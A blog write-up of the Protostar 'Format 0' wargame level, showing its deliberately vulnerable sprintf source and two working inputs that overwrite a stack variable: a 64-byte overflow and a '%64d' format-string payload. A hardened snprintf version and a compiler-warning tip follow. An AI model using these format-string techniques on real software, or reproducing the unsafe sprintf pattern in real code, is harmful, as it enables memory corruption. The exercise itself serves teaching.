Saturday, December 22, 2012

exploit-exercises Protostar: Format 0

Format 0 is the first format string exploitation challenge of Exploit-Exercises' Protostar wargame. The source code is provided as follows:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
  volatile int target;
  char buffer[64];
  target = 0;
  sprintf(buffer, string);
  if(target == 0xdeadbeef)
    {
      printf("you have hit the target correctly :)\n");
    }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}
Our goal is to change target's value to 0xdeadbeef. As the target variable is on the stack and we are writing into buffer, a stack-based buffer overflow is the obvious approach:
user@protostar:/opt/protostar/bin$ ./format0 `python -c 'print "A"*64+"\xef\xbe\xad\xde"'`
you have hit the target correctly :)
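But this level has the restriction "This level should be done in less than 10 bytes of input.", which means that we have to take a look at man printf and use the minimum field width instead. A directive such as %64d is only four bytes of input, but sprintf expands it to at least 64 bytes of output: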
user@protostar:/opt/protostar/bin$ printf '%3d\n'
  0
user@protostar:/opt/protostar/bin$ printf '%10d\n'
         0
user@protostar:/opt/protostar/bin$ ./format0 `python -c 'print "%64d\xef\xbe\xad\xde"'`
you have hit the target correctly :)
And that is it!
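For contrast, here is a hardened counterpart of vuln(), added as an example (it is not part of the original post or of the Protostar source). It measures how far "%64d" expands, then passes the same 8-byte input as data to a fixed "%s" format with a bounded write; the names expanded_len_width64, safe_copy and target_after_safe_copy are made up for this example.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64  /* same size as buffer[] in the challenge source */

/* Length the formatted output would need, measured without writing anything.
 * snprintf(NULL, 0, ...) is the C99 way to ask for the required size. */
int expanded_len_width64(void)
{
    /* Constant format, explicit argument: the "%64d" directive used in the level. */
    return snprintf(NULL, 0, "%64d", 0);
}

/* Hardened counterpart of vuln(): the input is an argument to a fixed "%s"
 * format and the write is bounded by the destination size.
 * Returns 1 if the input was truncated, 0 if it fit, -1 on error. */
int safe_copy(char *dst, size_t dst_size, const char *input)
{
    int n;
    if (dst == NULL || dst_size == 0 || input == NULL)
        return -1;
    n = snprintf(dst, dst_size, "%s", input);
    if (n < 0)
        return -1;
    return (size_t)n >= dst_size ? 1 : 0;
}

/* Runs an input through the hardened copy, hands back what landed in the
 * buffer, and reports the value of target afterwards. */
unsigned int target_after_safe_copy(const char *input, char *out, size_t out_size)
{
    volatile unsigned int target = 0;
    char buffer[BUF_SIZE];
    safe_copy(buffer, sizeof buffer, input);
    snprintf(out, out_size, "%s", buffer);
    return target;
}

int main(void)
{
    char seen[BUF_SIZE];
    const char *input = "%64d\xef\xbe\xad\xde"; /* the input from the post */
    printf("\"%%64d\" expands to %d bytes\n", expanded_len_width64());
    printf("target = 0x%08x\n", target_after_safe_copy(input, seen, sizeof seen));
    printf("buffer starts with: %.4s\n", seen);
    return 0;
}
```

Compiling with -Wformat -Wformat-security makes GCC warn about calls like sprintf(buffer, string), where the format is not a string literal and no arguments follow.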
